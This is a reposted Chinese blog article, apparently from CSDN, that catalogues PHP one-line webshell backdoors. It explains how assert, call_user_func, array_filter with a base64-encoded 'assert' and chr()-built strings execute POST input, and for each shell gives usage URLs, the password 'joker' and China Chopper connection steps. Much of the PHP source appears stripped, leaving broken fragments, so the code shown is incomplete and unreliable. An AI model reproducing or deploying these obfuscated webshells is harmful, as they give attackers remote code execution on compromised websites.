php回调后门,8. php回调后门

本文详细解析了PHP中常见的几种一句话木马形式,包括assert、call_user_func等函数的利用,以及如何通过菜刀工具进行连接。同时,文章介绍了这些木马的工作原理和使用方法,对于理解PHP安全和防止网站被黑具有重要意义。
摘要由CSDN通过智能技术生成

中国菜刀下载,基于原版中国菜刀优化版20160309.

下载地址:

China chopper

下面是收集并整理的各种一句话,带使用方法:

1.php

用法:http://www.xxx.com/1.php

菜刀连接用法:http://www.xxx.com/1.php

密码:joker

详解:  assert,是php代码执行函数,与eval()有同样的功能,应为$array[],POST[]都是数组,所以$array[]=$POST,就是把$POST数组的值赋给$array数组,这样的话$array[0][‘POST‘]的输出就是assert,所以组成了一句话木马

assert($_POST[‘joker‘]),直接用菜刀链接即可

————————————————————————————————————————————————————————

2.php

@$gg($_POST[joker]);?>

用法:http://www.xxx.com/2.php

菜刀连接用法:http://www.xxx.com/2.php

密码:joker

详解:$g是个数组,$g[1]=‘s‘,chr(‘116‘)=‘t‘,(https://blog.csdn.net/yabingshi_tech/article/details/19833217 ASCll码对应表),这样的$gg=

assert,@$gg($_POST[joker])不就是assert($_POST[joker]),是我们常见的一句话木马,直接菜刀链接即可

————————————————————————————————————————————————————————

3.php (array_filter+base64_decode)

用法:http://www.xxx.com/3.php?e=YXNzZXJ0

浏览器提交POST:joker=phpinfo();

菜刀连接用法:http://www.xxx.com/3.php?e=YXNzZXJ0

密码:joker

详解:YXNzZXJ0的base64解码后的结果为assert,$e接受浏览器传过来的参数,$arr是个数组,array_filter()函数用回调函数过滤数组中的值,

20180506125306784583.png,如果我们传入$e的参数为YXNzZXJ0,这样的话我们的回调函数名就是assert,并且要过滤数组中的每一个参数

就构成了assert($_POST[‘joker‘]),常见的一句话木马,直接用菜刀链接即可

——————————————————————————————————————————————————————————

4.php

用法:http://www.xxx.com/4.php

菜刀连接用法: http://www.xxx.com/4.php

密码:joker

详解:call_user_func()函数把第一个参数作为回调函数调用,也就是说assert是被调用的回调函数,其余参数是回调函数的参数。

这样的话就直接构成了  assert($_REQUEST[‘joker‘]) 这样的一句话木马,直接用菜刀链接即可

原文:https://www.cnblogs.com/bmjoker/p/8997793.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值